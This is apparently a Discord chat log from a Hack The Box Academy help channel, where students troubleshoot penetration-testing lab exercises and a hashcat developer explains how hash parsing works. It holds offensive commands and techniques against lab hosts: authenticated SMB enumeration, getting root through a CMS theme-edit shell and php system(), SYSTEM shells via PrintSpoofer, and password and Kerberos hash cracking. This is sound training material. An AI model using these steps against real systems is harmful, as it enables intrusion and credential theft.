#modules
Okay, I read the old text on the medium lab and found the FTP port number. I did a scan on that particular port; it is closed.
last time -p- took more than an hour and a half tho
I reset it many times, still has this issue
spoiler btw
not supposed to take that long
||┌─[✗]─[htb-student@skills-par01]─[~]
└──╼ $sudo crackmapexec smb 172.16.7.50 -u AB920 -p weasal --users
SMB 172.16.7.50 445 MS01 [*] Windows 10.0 Build 17763 x64 (name:MS01) (domain:INLANEFREIGHT.LOCAL) (signing:False) (SMBv1:False)
SMB 172.16.7.50 445 MS01 [+] INLANEFREIGHT.LOCAL\AB920:weasal||
many suggested resetting the machine and waiting for 5 min, then scanning it tho; I'm trying this, hope this works
try the command ||net user /domain|| when authenticated as A**
Giving me an error.. ||Access is denied.
Evil-WinRM PS C:\Users\net user /domain
The request will be processed at a domain controller for domain INLANEFREIGHT.LOCAL.
net.exe : System error 5 has occurred.
+ CategoryInfo : NotSpecified: (System error 5 has occurred.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError||
strange
you can try the tool rpcclient; iirc it has an option for enumerating domain users, or use the tool kerbrute covered in the module
Like I said - I tried all the options.. both external in Linux and internal in Windows.. I'm really out of ideas
merry christmas bro
you should always target the DC for user enum, non-DC machines don't have records of all the users
it works
Can anyone recommend a healthy office chair for long hours from an online store
cuz I can't feel my back
what do you need help with
wrong channel for this lol but I use a Steelcase Gesture
Wrong channel but I recommend Herman Miller Embody 👀
I know wrong channel but goddammmmmmm, I checked it out did not expect the price
Why are y'all's chairs more expensive than my computer 😭
hey if you wfh + study with free time like me, might as well get something good if I'm spending 12+ hours on it every day
Good point, but does it give a good benefit for doing more modules (pretending to be on topic)? Like the diff between a $100 gaming chair and a $1200 office chair
All the people I know that have them swear by the Herman Millers
In task 1 of the skills assessment, we are given a loaded shellcode and have to modify its assembly code to decode the shellcode. I have done the modifications required to decode it and even got the decoded shellcode, but running it does not give me the flag
yeah you automatically become a better hacker if you have an epic gaming chair 😎
you will get backpain if you spend too long on cheap chairs that's for sure
Getting a Herman Miller ASAP
Tested it out recently in store
Also have a standing desk on the way
what have you tried? it's not too complicated: XOR the values in the stack with a loop and move the pointer by 8 bytes every loop, then with the shellcode decoded you can just be lazy and copy them out from gdb, remove all the 0x and use the shellcode loader script to run it. it can also be done entirely from CyberChef once you have decompiled it
Intro to Assembly Language Skills Assessment 1 (edited to help whoever is searching for this, hello :)
Good.. ask in #cdsa if you need more detail
I know and I did exactly the same thing you are telling but somehow my shellcode isn't working
dm me your code, I'll take a look
I had a choice between Aeron, Embody and Gesture, went with Gesture, the better choice imo
That's the only one I haven't tried out. Will see if i can track one down
Ohh I see, the Gesture is from Steelcase
Just solved the Getting Started module's final machine ⚡.. my intuition told me to edit theme.php of GetSimple CMS and get a shell, and run sudo -l in the shell.. I found php, it could be run without a sudo password.. then I spawned /bin/bash with php's system() function and I got root ⭐ I had so much fun and learned so much! I'm loving it 😍
Introduction to Digital Forensics (Rapid Triage Examination & Analysis Tools)
hi guys, I completed the whole module but I'm still stuck on this question, can someone help me?
oh, that one was a doozy
It tells you to analyze the USN; how was it analyzed in the module?
I think after running something on it, it can be opened in a tool, then you are gonna wanna use the zone identifier information like the question tells you to
It took me quite a bit of fumbling
- 0 What is the type of the service of the "syslog.service"?
||rsyslog.service - System Logging Service
Loaded: loaded (/lib/systemd/system/rsyslog.service; enabled; vendor preset: enabled)
Active: active (running) since Mon 2023-12-25 16:28:37 UTC; 45min ago
Docs: man:rsyslogd(8)
http://www.rsyslog.com/doc/
Main PID: 1121 (rsyslogd)
Tasks: 4 (limit: 2317)
CGroup: /system.slice/rsyslog.service
└─1121 /usr/sbin/rsyslogd -n
||
is the answer not ||System Logging Service||
happy holidays btw :)
You can DM me if you haven't already figured out the Injection Attacks skills assessment.
hit enter
Module : Attacking Common Services
Activity Question : Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.
Question: do I need to bruteforce the .htb or the .com? It seems like I don't get any results from enumerating the .htb domain
Got a flag from using dig against the .com domain, but it's most likely a rabbit hole
guys, I just invited one of my friends to Hack The Box Academy but I still did not get any cubes
is this real ?
The question says you should use .htb
okok, I'll focus on .htb; weird, no results and it always times out. The target is listed in /etc/hosts as well
Why in /etc/hosts?
You have to use the target server as nameserver
I see okay okay thanks
Please help me with the HTTP ATTACKS skills assessment. I'm stuck and can't figure out why the messages aren't coming. I have desync, I have an explicit TE.CL which I implemented via TE.TE, I bypassed the WAF by load encoding, and I used CRLF header injection. But I still haven't been able to receive messages in MailHog
I followed the method for how it was analyzed in the module but still didn't find anything useful. I tried all the .exe programs that I saw while analyzing the USN, but still nothing
did you convert it to a .csv?
Yup
what are you using to analyze it?
I tried with MFT Analyzer (but I didn't get information from that program, that's obv) and Timeline Explorer
i used timeline explorer
use it to look at zone identifier info
I tried also the string in powershell to search the zone Identifier into Downloads folder
did you know you can create filters for each particular field in Timeline Explorer?
Yup
I filter the program "uninstall.exe" with the PID
the best I can do without giving the answer is telling you to read up on zone identifier and try to filter with it
if you filter by uninstall.exe, you won't find any other exe
Use the "cobaltstrike_beacon" index and the "bro:http:json" sourcetype. What is the most straightforward Splunk command to pinpoint beaconing from the 10.0.10.20 source to the 192.168.151.181 destination? Answer format: One word
I'm not sure what it expects as one word
for reference, thanks 🙂
Is the answer one of these commands or do I fill it up?
Hey everyone, I'm doing Footprinting module and I'm struggling to complete medium lab.. after gaining some credentials for users ||Alex|| and ||sa|| I can't use any of them to complete the exercise.. can anyone help me please?
strange
Open as admin
Do you mean to open the terminal as an admin?
Open the db gui as admin if you're unfamiliar with command line sql queries
Attacking common services goes over cli stuff
Hello Everbody,
I am using the tcp433 VPN and it works, but when I do a netcat search it cannot find a host. What could be the reason?
Happy New Year ))
Netcat search?
netcat 94.237.56.188:52910
94.237.56.188:52910: forward host lookup failed: Unknown host
I get this error
Netcat is a connection protocol; 94.237.56.188 is the IP. If I remember, you need to specify the port separately, just after specifying the host
Target: 94.237.56.188:52910
Time Left: 66 minute(s)
Apply what you learned in this section to grab the banner of the above server and submit it as the answer.
I have a task like this, won't I do it with netcat?
I.e. netcat 94.237.56.188 52910
"What you learned in this section" is the key here, what did that learning section teach you
Usually the questions will relate to what you just learned
Use the cracked password of the user Kira, log in to the host, and read the Notes.zip file containing the flag. Then, submit the flag as the answer.
Password Attacks - Protected Files
I even tried mutated-password list, nothing came up.
I got the Notes.zip via ftp.
did zip2john Notes.zip > zip.hash
john --wordlist=custom.list , yet ..nothing.
52910, I still don't understand what this part is. Isn't it with the IP?
have you tried rockyou.txt
It should be in the mutated list, if not try rockyou
That's odd
looks like a public web server matched to the port 80
The notes.zip passwd is definitely in mutated list
same
Make sure the zip2john didn't create an empty file. Iirc this one needs to be run with python2 (could be wrong tho)
Yeah, I opened it.
There's a difference though, I looked up this:
His came without *
That's just Discord reading * as markdown since they haven't put it as a code block
Copy it and see you'll get the same
^
Started to pass PersistenceIsFutile, got stuck. I can't get the flag; I'm stuck on 5. Writes
Sounds like a box or something
Read #welcome to find out how to access more of the server
That list is 94k words yeah?
Issue 5 is partially remediated
Sirg this channel is for help with academy modules
Around that.
Then it should be right
I just did a grep and it's in there
So for sure John should crack it
I just don't get what that error message is: Loaded 1 password hash (PKZIP [23/64])
And why doesn't it crack.
Done.
Now try again?
Reading is crucial
I don't get what that crash file was for, though.
It probably had a weird error
Okay I went to another place for help
and borked ¯_(ツ)_/¯
Cool bye
I give up, i wanna cry
bud, just dm me, I'll try to help
module attacking common applications - attacking gitlab.
i am asked to find another user, already got this list ||┌──(chilledvains㉿kali)-[~/htb-academy/new one]
└─$ ./gitlab_userenum.sh --url http://gitlab.inlanefreight.local:8081/ --userlist /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt |grep [+]
[+] The username bob exists!
[+] The username root exists!
[+] The username public exists!
[+] The username help exists!
[+] The username hacker exists!
[+] The username explore exists!
||
but none work..
I don't see the valid username in the output
the username is case sensitive btw
my last message is gone somehow. but linpeas brought me the answer
Probably because it revealed a direct way to get the answer
yes, it dumped the user database from git for me.
¯_(ツ)_/¯
The Password Attacks easy lab wasn't that bad. Is it that common for crackmapexec to bug out?
hey guys
Wsg.
--local-auth go brr
i am trying to find something but, i guess my brain is fooling me
Share what's on ur mind.
Have you guys heard of greysec or some og old dead forum, starting with the same name or having a similar name?
That's unrelated to the channel topic
am new here
aha
What if I make a lab with EDR.
Chaoslab.
sure
MMMMMMM
Hi, I am doing the passwords attacks lab and having trouble extracting NTLM hashes from LSASS dump file with pypykatz. I am running the same command as in the module but pypykatz states it is unable to parse the dump file.
Do I need to upgrade pypykatz or is this a separate issue?
Sounds like a separate issue
nvm tried it again, something must have gone wrong during file transfer
I'm in the Getting Started module at the knowledge check
I found the password, cracked it, logged in as admin
but I can't get the Metasploit payload to work, I think the TARGETURI is not the right one, can someone give me a hint?
RHOST, RPORT, LHOST are the things you need to change
yes i did
If you messed with TARGETURI that's likely to have messed with it
By default it is blank; I tried it this way, but auth doesn't work then.
When I try /admin/ it authenticates but won't exec the payload
Then you might also be using the wrong payload
okay good point
Make sure it's for the right version of the plugin
okay, I did not have to use the payload for authenticated file upload
I can just use the unauth RCE
😉
man, I always forget to take a step back and look at the big picture
okay got it, thanks @fathom pendant
hi guys
what modules should I get into, for brand new people who wanna get into hacking?
Information Security Fundamentals path
ok ty
i dont have enough cubes 😦
you don't buy all modules at once
and for tier 0 modules you get the cubes back when you complete them
for tier 1 and above you get 20% back
o
ok ty
also how can I test stuff bc I closed my free web-based Parrot OS
and im on windows
I'm in the Nmap medium assessment, I don't know why but the script doesn't give me any information about the DNS, does that mean the IDS is blocking it?
Hi, I can always STRICTLY check the public records for the inlanefreight.com domain in Linux using the dig or nslookup command, right?
what does "apt list" show you if not all installed packages?
head -n 5
there you will see something interesting :)
Hi, I'm having some problems in Windows Event Logs & Finding Evil
Tapping Into ETW. After following the guide and using SilkETW.exe I don't have a ManagedInteropMethodName that starts with "G" and ends with "ion".
the only answer I found is TdhGetEventMapInformation
||My message got deleted, maybe because of a spoiler, so I'm writing it again with a spoiler filter. Everything works until the last command SilkETW.exe -t user -pn Microsoft-Windows-DotNETRuntime -uk 0x2038 -ot file -p C:\windows\temp\etw.json I don't get the expected results. Maybe it's something I have to change but I'm not sure what||
try from the pwnbox
I'm looking for a buddy so we can learn about hacking together 🙂
bc I wanna get into hacking, and having a buddy learning with me that we can chat about it with would motivate me and it might motivate u too, so just reach out
let's just be friends!! and we like help each other ig
like friends that wanna learn to code
i add u
Yeah, what do you know? Some basic stuff? Can you tell me
Hi
I need help
anyone else wanna be buddies with me and learn
ill be ur fren, fren
Okie
OMG yoo I'm still stuck on the easy lab and you're in medium, what command did you put to pass it?
using the pwnbox
hi guys, for the Command Injection skills assessment, I figured out the injection point, but my command to read the flag is displayed as output instead of being executed as a command. Please can I DM someone, I just need some help to figure out where I am making a mistake.
strange
As I can remember, I used the aggressive flag -A to perform all default scripts like the flag -sC does
@lucid sluice
do you mind if I DM you? I'm stuck on that skills assessment, tried ||loads of server-side JavaScript injection payloads, and also MongoDB operators like $ne, $gte, furthermore tried editing Content-Type to application/json and JSON payloads||
Can anyone help me?!
I'm stuck in this module, for some reason I cannot do a zone transfer. I connected to the VPN, I wrote the IP and domain to the /etc/hosts file
I am using the "dig axfr inlanefreight.htb @ipv4" command. I restarted the target, I connected to another VPN server, but I still cannot do a zone transfer, can someone help me
guys do i need to install nmap or do i just have it?
what errors did you get?
it usually comes preinstalled
Basic error I think, failed zone transfer
ok
strange
that command
Yeah, I think my pc tired 😂 I will try again
I know that command supposed to work, there is something with my internet
dig axfr inlanefreight.htb @ip
you still need to specify the name server
I know and I already did
name server being the IP
:P
otherwise you may also need to add the nameserver to /etc/hosts (using either nslookup or dig ns)
eyo @next bronze my cracking is !FAST! offline it is so so fun
I no longer hate cracking
hahaha this is great!
nice
they should put a disclaimer on the hashcat module to not use it in a vm
some hashes are still a pain though, namely bcrypt and yescrypt
hiiiiiiiiiiiiiiiiiiiiiiii
thanks
Hey, I'm in the Pivoting module in the SocksOverRDP section. When I try to load SocksOverRDP-Plugin.dll using regsvr32.exe, I get the following error. I've already disabled Windows Defender
Ill try that later, ty
why am I getting this error? ./backupjob: line 1: syntax error near unexpected token `newline' ./backupjob: line 1: `<head>'
you need to be more specific
In the Pivoting module where we find routes that AutoRoute 172.x.x.x, I created a msfvenom file; when I cat'd it I didn't see the binary, after re-running it I got it
you still have realtime protection running
No, when I had it, I got the error: Operation didn't complete successfully because this file might be a virus or malicious software. After I turned it off in settings I got this different error
Good day and Merry Christmas. Can someone guide me in the right direction? What can I do? My live USB Kali does not boot.
EXT4-fs error (device sda3): ext4_lookup:1853 inode:5505046 comm systemd-journal: deleted inode referenced: 5515237
EXT4-fs error (device sda3): ext4_lookup:1853 inode:5505046 comm systemd-journal: deleted inode referenced: 5511556
EXT4-fs error (device sda3): ext4_lookup:1853 inode:5505046 comm systemd-journal: deleted inode referenced: 5511556
I had the same problem. Try running cmd as admin. That fixed it for me
Okay I'll try it now, ty!
Make sure the dll is still in the folder and not deleted by the protection first
And confirm realtime protection is off.
I'll pay attention to all of those, thank you
@fathom pendant hello, I am doing the assessment
You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer. from
Attacking Common Services - Easy
I found the username and password
and logged into the account mysql
I am unable to get the reverse shell
can you please help me?
IPv4 Active Routing Table
Subnet Netmask Gateway
||10.129.0.0 255.255.0.0 Session 1
172.16.4.0 255.255.254.0 Session 1||
Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x) Why does it say wrong when I submit those?
Might be how you formatted it. Try IP:netmask can't remember myself
nah, still not working
Can someone understand this? Why is this happening? I changed my VPN server 5 times and restarted; I also waited 5-6 minutes then tried again, but a simple zone transfer is still failing
If I remember correctly there were 2 screenshots where they ran AutoRoute. I had the same issue, I was using the wrong ones
is pinging moderator allowed?!
What is it about?
[msf](Jobs:1 Agents:1) post(multi/manage/autoroute) >> run ||autoroute -s 172.16.5.0/23||
[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: linux
[*] Running module against 10.129.202.64
[*] Searching for subnets to autoroute.
[*] Did not find any new subnets to add.
[*] Post module execution completed
I did it with /23, /24, /16, still couldn't find more
It is about the zone transfer and I am failing, I have no idea why
you’re on the right track
And what does that have to do with a moderator? 😉
I think maybe they know what is happening
The answer is in the screenshots provided in the lesson I believe. I'm not near my computer to test
A zone can be configured so that a zone transfer is not allowed from every host. The module shows alternative ways.
I can't see exactly what you are doing in your video on my cell phone because it is simply too small
I showed that I wrote the IP and domain of the target to the /etc/hosts file and I have a normal connection with the VPN, and I tried the zone transfer as the module shows but it failed. Thank you for your attention BTW
The entry in the hosts file is unnecessary.
However, you must use the target IP as NameServer.
As I said, you can configure a zone so that not everyone can carry out a zone transfer.
try in pwnbox too
||172.16.4.0/172.16.5.0|| it says wrong bruh, oh okay
I've managed to make it work up until the last step needed, I get an error when trying to connect as jason, I looked at the hint but I don't find any way to bypass it
I'll look at my notes in a bit
usually the value after the / should be the netmask
Yea it should be netmask
Screenshot?
Can I use spoilers on images btw?
Yes
Sure but I don't have my computer near me. Might not be as much help as you would want.
Thank you very much. I found the answer. Can you focus on one more thing?! Sometimes the VPN file (from the protocol-choosing location) is not working
But from this location it worked
When I download the VPN file from the corner of the question section, the zone transfer immediately worked, I think it is a bug or something. It was all about the VPN file
@lusty thicket you were right, using the pwnbox it works, i have no idea why tho
version difference probably
hi. I'm doing the CrackMapExec module, but I cannot figure out this question (Which domain account, other than Guest and krbtgt, is disabled?) in the 'Finding Secrets and Using Them' chapter. Can someone help? (using the commands: proxychains4 -q crackmapexec smb 172.16.1.10 -u robert -p Inlanefreight01! --ntds --enabled and proxychains4 -q crackmapexec smb 172.16.1.10 -u robert -p Inlanefreight01! --ntds)
use netexec instead, at the end it will give you a command to find enabled accounts, modify slightly and you can filter for disabled accounts
FOOTPRINTING Module: Oracle TNS, but all I get is: bash: sqlplus: command not found, how do I fix this ?
or you can just cat the ntds log file saved by cme
install sqlplus 
yeah, I got it. The thing that was bugging my mind was that --enabled wasn't doing anything (in the output), but with cat it shows the answer
thank you @next bronze
Can y'all explain what must have happened with the IDS? How was it fooled?
because 53 is DNS, it basically treated the request as a DNS pass-through request (because of bad config)
it's explained in the DNS proxy section of the IDS/IPS filtering section that taught you how to scan/identify/connect and all that
also should probably delete this
as this is revealing how to get the answer for a skill exam
Sorry
i get you're excited about sharing that you learned things
Deleted
but you do have to be careful with sharing that excitement
Yes ,noted
Hi guys, can someone help me with question 8 in the module "AD Enumeration & Attacks - Skills Assessment Part II"? Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host. I have tried everything I can think of but I don't know how to continue.
My brain had told me to do a full scan . Like all the ports. But i refused to believe that there will be something running on later ports . I was looking all over at 21,22,80 and even 3306
check all the accounts you have creds to and what they can access
Don't know if this is the right place to ask, but why can't I spawn the target machine in the "Dancing" Starting Point box?
this indeed is not the right place
Where would that be?
read #welcome on how to access more of the server so you can access #starting-point
Hi, I was thinking of getting a sub to the main platform. Is there any student discount there, cuz I could not find one
it's more nuanced tbh https://help.hackthebox.com/en/articles/5192347-university-offerings iirc you have to go through your university for it on the main platform
I do not think my uni has support for it and I have almost completed my graduation so I do not think I will get any kind of response about it
Can I dm you?
I don't have the exact steps, check with the accounts you have access to
You can dm me if you need help
so does nmap use multiple source ports? maybe bc multithreading?
*can't see in this picture but further down it also uses different source ports
sometimes yes
Anyone know what could be the issue here? Neither John nor Hashcat is recognizing my txt file as a hash to crack, trying to get the cleartext password: no matter if I try to input the hash as a string or file, I get this error: john --format=Raw-MD5 ./hash.txt
Using default input encoding: UTF-8
No password hashes loaded (see FAQ)
the text file has nothing else inside it except the hash gained from scanner/ipmi/ipmi_dumphashes
you sure the hash is supposed to be raw md5?
I tried nearly every other as well, not getting a single hit where john even tries to crack it
I'm not sure about john but there's a specific hashcat mode for ipmi hashes, check hashcat examples
I wonder if he updated the ssl on hashcat.net lol
But hashcat -h will have the list in there
can you elaborate
Hashcat.net ssl expired, so the example hashes page wouldn't load
It literally has nothing to do with any commands you're running
is it? works for me 
When I checked like last week it wasn't
if you're doing the footprinting module the mode is given in the section
So likely fixed in that time
It's working, but getting the same issue as john: Hashfile './hash.txt' on line 1 (7e6357...efa123456789abcdef140561646d696e): Token length exception
No hashes loaded.
what's your hashcat command
hashcat -a 0 -m 400 ./hash.txt /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou-05.txt
double check if nothing like hashcat.txt:...........actualhash is in the file
like I said, it's not md5, let alone the phpass md5 that you're using
400 isn't the right mode
I've had this after converting the hash
find the right mode, either in the section or hashcat example
<ctrl-f> 'ipmi' on https://hashcat.net/wiki/doku.php?id=example_hashes
oh yeah, I tried 7300 as well, but it's the same issue, won't load the hash for the life of me
text file appears to be clean
7300 should work
try with --username
Does anyone know how I can intercept a USB signal to understand how a keyboard's API works?
hashcat --example-hash | awk -v RS= "/SHA-1/"
the RS= with a blank means it uses a blank row as delimiter, and /SHA-1/ is your search term; this way you can easily look for the hash modes by filtering
😞
Sorry for the inconvenience, I only asked here because I've already searched everywhere and I'm out of ideas.
This isn't the place to ask
Read #welcome on how to access more of the server
Got it to work, thank you all for the help 👍 Idk why, but I'm always having most of my issues with password cracking
with --username?
I made the hashfile again, and it looked exactly the same but worked now
maybe there was a space or such
token length exception means you missed a character or have an extra character somewhere
He learned how to read 
hello guyz, finished my CPTS path. If anyone needs help with anything let me know here or feel free to DM. This way I can double check some stuff I may have missed somewhere in my brainz, also I can contribute a little to this community. Have a nice day 😊
and merry christmas 🎄
can you double check my flags by just giving them to me? I will not elaborate or tell you what I did
Hey, in the skill assessment of pivoting module, how are we supposed to find hosts on the internal networks?
I used ping sweep with increased timeout to actually get something, and nmap returns host is up for all the network. It seems like these two are not very stable/consistent in finding hosts
proxychains doesn't support ICMP (ping) for nmap you need to use -sT
Need some assistance for Active Directory skills assessment pt2. Priv esc from the service account in SQL01 to get the flag in the administrator desktop. Potato doesn't seem like that way (Can't get the exploits to run), PrintSpoofer always creates a new cmd/powershell with the same service account instead of SYSTEM..
potato is the way
if I remember right you need to use juicy potato, choose a CLSID
Can I DM someone for help with the skills assessment for HTTP ATTACKS?
yez
which one u need
all
I made it with PrintSpoofer
I sent myself a reverse shell as SYSTEM
Hmm, I'll give that another try then. I wasn't trying to get a rev shell. But the interactive shell it gave back was the exact same user.
the reason I chose a rev shell is because I was in mssqlclient.py
don't know how u are doing it
didn't we have command execution directly on the host connected to the internal network?
yeah it will pop open another window by default, if you don't have gui access you can't get that shell
You have to somehow scan the internal network to find the last host. @next bronze I tried your solution but when it finishes going over all the ip addresses it just starts again and doesn't finish for some reason
you have ms-dos command execution i think
do a standard ping sweep
i remember i had to repeat it
also check the arp table
we were down for about a day because of that 🙂
That's what I ended up doing, but it's not very consistent and I had to increase the timeout a couple times for it to find something
i just happened to be unlucky that day ig lmao
yeah, it caught me off guard as well, took about a day for the person with access to get to it 🙂
cause i was looking to see if asrep was a thing but it doesn't look like it
and even running the hash to see if it autodetected it didn't know
¯_(ツ)_/¯
That's so weird. Staying in the same process it kept the same user. But a reverse shell worked and I got SYSTEM.
^ it doesn't inject the system shell in the current process
That's a good thing to learn now 🙂
What for?
Merry Christmas y'all, I'm stuck grabbing the flag in the Environment Enumeration section of Linux Privilege Escalation. I found a user other than "htb-student"; this user has 2 interesting files, one related to vim & the other to cache, but htb-student has no permission to read either of them.
I found another interesting thing with sudo -l command, but when I ran the command I'm receiving this message, Sorry, user htb-student is not allowed to execute '/usr/bin/ncdu' as root on ubuntu.
the better pivoting tool, though I would recommend doing that module with the tools given, those will come in handy sometime
I've seen someone who mentioned it here. Is it introduced later in the course? Or just something worth while adding to my toolbox?
it's not introduced/mentioned in the course at all
it's not, but it's my go to for pivoting for a while now
it's just a tool that people have recommended after struggling with the introduced tools
(though still good to know how to do things other ways)
huh weird, did you figure it out?
it just looks like it's not supported yet, I'll have to pull up the hash to get the exact format of it
do you remember the e type?
but it was like krb5tgs$23$ iirc
oh that's 13100
Good to know. Btw, nmap still hasn't returned, I used: ||proxychains nmap 172.16.6.0/24 -sT -oN hosts||. Am I missing something?
etype 23
i tried it said no 
It doesn't support asrep18, which is AES key encrypted
most people don't see many other kerberos etypes
only for asrep23 which is rc4
this is true
17/18 and etype 3 all have limited/no support still
though that's mostly for lack of priority iirc
yescrypt support when 😡 /j
$krb5asrep$23$ is the start could it be the username having @ in it? username@domain?
https://github.com/MWR-CyberSec/configmgr-cryptderivekey-hashcat-module I found this hashcat plugin for ASREP etype 18 but, haven't tried it.
thats a little different
huh interesting
-oN saves the output, if you want to supply a hosts file use -iL, and if you just want to do a quick sweep do -F
i just chalked it up to "htb said no cracking this one" ¯_(ツ)_/¯
I saw that john has support for etype 18, but it failed to crack it (I know the password)
always be a little careful with unofficial modules/plugins like this, as the plugin system is built to execute essentially raw c code
raw chicken code?
Yup yup, If I had to build it, I would have to build it inside a sandbox
this is 18200, Kerberos 5, etype 23, AS-REP
not nearly as common as 13100
but certainly supported
yeah, or just take a peek into the module/kernel sources
as the format is very simple and shouldn't really be more than a few hundred lines
well, relatively simple
isn't 13100 kerberoast rc4, it's not asrep
this is the 13100 signature
and this is the 18200 signature
yeah i was misremembering
because i did a LOT of googling at the time
and was like "well that's CLOSE"
$krb5asrep$23$user@domain.com:3e156ada591263b8aab0965f5aebd837$007497cb51b6c8116d6407a782ea0e1c5402b17db7afa6b05a6d30ed164a9933c754d720e279c6c573679bd27128fe77e5fea1f72334c1193c8ff0b370fadc6368bf2d49bbfdba4c5dccab95e8c8ebfdc75f438a0797dbfb2f8a1a5f4c423f9bfc1fea483342a11bd56a216f4d5158ccc4b224b52894fadfba3957dfe4b6b8f5f9f9fe422811a314768673e0c924340b8ccb84775ce9defaa3baa0910b676ad0036d13032b0dd94e3b13903cc738a7b6d00b0b3c210d1f972a6c7cae9bd3c959acf7565be528fc179118f28c679f6deeee1456f0781eb8154e18e49cb27b64bf74cd7112a0ebae2102ac
if your hash looks like this
it should be supported
if it doesn't look like this, then we'll have to see what the difference is and why it looks different
I have a note file that is just a quick list of super handy hashcat modes
which happens from time to time
our coverage isn't perfect, especially as already called out for etype17/18/3
though i think someone did the work for 17 recently so it may just be 18/3 left
i swear i tried 18200 before and it said no
but i could just be mentally handicapped
i didn't need to crack it anyway for the purposes of the module (yet)
fair enough, if you run into it again let me know and ill debug with you
but was just like "wtf, i swear i did this before"
and running just hashcat file.hash should give the correct mode yeah?
in theory* if it's not being goofy
if you have issues with the format in your file, it obviously can't tell
and of course, plenty of hashes can't be identified that way
oh wassup, I always forget you're the hashcat dev every time lul
Auto detect mode would do the trick yeah. or else it'll give you the closest modes to choose from.
heh
0 rank on htb
0 rank on this account 😛
a blue name for someone working on such a critical tool gives some cognitive dissonance
yeah that is sorta funny actually
LMAO
No hacking just cracking
crack deez chestnuts (please i am weak and require nutrition)
i dont know if there's a role for "works on the thing you're using" in here or not
Good way to confirm that rank means nothing
i think they got rid of a lot of vanity roles
Nope but perhaps there should be such a role
¯\_(ツ)_/¯
lol first time I saw you here I was like this guy definitely knows what they're talking about, checked the profile and hashcat dev
Oh well they did have some sort of cross community contributor role for people like john Hammond. wonder if they kept that or tossed it
i dont think its that necessary, but i can see how it'd be confusing to be blue and also the primary source for this info lol
it's alright tbh kinda lets you blend in with the plebs lmao
yeah, probably cuts down on a lot of the DMs
@languid fjord petition for @paper gust to get cross community contributor role for being the hashcat dev(if they want it)
¯\_(ツ)_/¯
@surreal rain
also tbh lowkey love the feature for outputfile and outfile-format
I think it would personally
this went through some decent changes around the last release and is now pretty useful
i need to go through and add some stuff to it
and make debug files and such more like outfiles
cause even though most regulars know rank doesn't mean shit, it's very easy for most people to dismiss blue name people not realizing they may in fact be active in critical work lol
Will have to think that one over. Traditionally it's been reserved for other discord communities. But this is a good use case i think as well
yeah, i hadnt really been paying attention to the colors/ranks but i could see how it'd be confusing
one thing i did find is that if you already did crack without specifying an outfile - then you need to add --show for it to produce one
to be fair, we DO have an official discord server/community
yeah even though its not true, people often consider blue==newb
correct, this is the intended workflow actually
which again, makes sense tbh
outfile just saves the output right?
i was messing around with it the other day
oh yes --show --username is great with potfile
yup, can make quick work of an NTDS dump
ye the output of the hash:password (if you specify format you can have it JUST give the password)
assuming you dont have TOO many usernames
there's a hidden danger with --show/--username mixing
it compounds the search space when it reparses/searches everything
which can lead to some very very very long runtimes
am i right in assuming if you do --username and --outfile-format=2 (password) that it would output username:password or is that something i'd have to tinker with to figure out
iirc we added a message that warns users of that
yes it should, assuming you are doing it with --show
Can have it for now at least
during the attack, i dont think it will
interesting
nice
great to pick your brains on this lol i'm sure the outfile and format stuff was a pain to get working properly
if you have any better role ideas, I'm open to whatever, sounds like others were just concerned about visibility
it's been through some iterations
and needs to go through another
we have a large change being staged right now
i think what i did before was do something like cut -d ":" -f1,7 for NTLM hashes
once the next big set of changes and the next release come out
i'm overhauling the logging/debug/outfile/etc.
NICE
logging especially could use some serious work
the current log format is for hashcat, not for its users
need to bridge the gap a bit
LOL "yes it stopped on this, but why"
yeah, and internal codes that are raised but not defined
the numbers mason, what do they mean
trying to figure out what the status codes are without them being mapped to the log is a hurdle
I just want to find hosts that are up/active
idk if it's in the works (or how feasible it is) with the token length exception error (which to most people it's obvious that it's too short/long and they goofed) to specify that the expected field is too short/long. as it is right now i don't see many issues with it but it can definitely help with some minor/quick debugs
like "oh i left in an extra space"
this is a bit more complicated of an error than it sounds
yeah i figured
the problem is that token length exception is NOT hash length exception
its token length
when you load a formatted "hash" into hashcat, we take it through a parsing step we call the "tokenizer" that breaks it down into several pieces and validates each one separately based on some rules we define in each module
this is great for us, but leads to an uncomfortable situation where if it fails the raised errors are generic
ah like NTLM stuff being broken down into its defined sections
here, i have a good example
```c
token.token_cnt = 6;
// username
token.sep[0] = ':';
token.len_min[0] = 0;
token.len_max[0] = 60;
token.attr[0] = TOKEN_ATTR_VERIFY_LENGTH;
// unused
token.sep[1] = ':';
token.len[1] = 0;
token.attr[1] = TOKEN_ATTR_FIXED_LENGTH;
// domain
token.sep[2] = ':';
token.len_min[2] = 0;
token.len_max[2] = 45;
token.attr[2] = TOKEN_ATTR_VERIFY_LENGTH;
// lm response
token.sep[3] = ':';
token.len_min[3] = 0;
token.len_max[3] = 48;
token.attr[3] = TOKEN_ATTR_VERIFY_LENGTH
              | TOKEN_ATTR_VERIFY_HEX;
// ntlm response
token.sep[4] = ':';
token.len[4] = 48;
token.attr[4] = TOKEN_ATTR_FIXED_LENGTH
              | TOKEN_ATTR_VERIFY_HEX;
// challenge
token.sep[5] = ':';
token.len[5] = 16;
token.attr[5] = TOKEN_ATTR_FIXED_LENGTH
              | TOKEN_ATTR_VERIFY_HEX;
```
this is the tokenizer code for NetNTLMv1
you can see how each part of the hash is broken down on its own
Ok yeah
and has its own token attributes for validation
i can see how it can get crazy to be specific for certain things
so like, if the LM response token is the wrong length or wrong encoding
how do we raise that JUST that token is wrong?
currently, we check the tokenizer as a whole
so it's difficult
and it makes sense to do that tbh
so it will only throw hash length exception when it's not being broken down, like raw hashes
typically, when theres only 1 token, or the tokens are ignored mostly
```c
static const char *SIGNATURE_KRB5PA = "$krb5pa$23$";
[...]
token.token_cnt = 6;
// signature: "$krb5pa$23$" is checked first, so the hash type is identified before anything else is parsed
token.signatures_cnt = 1;
token.signatures_buf[0] = SIGNATURE_KRB5PA;
token.len[0] = 11;
token.attr[0] = TOKEN_ATTR_FIXED_LENGTH
              | TOKEN_ATTR_VERIFY_SIGNATURE;
// user
token.sep[1] = '$';
token.len_min[1] = 0;
token.len_max[1] = 64;
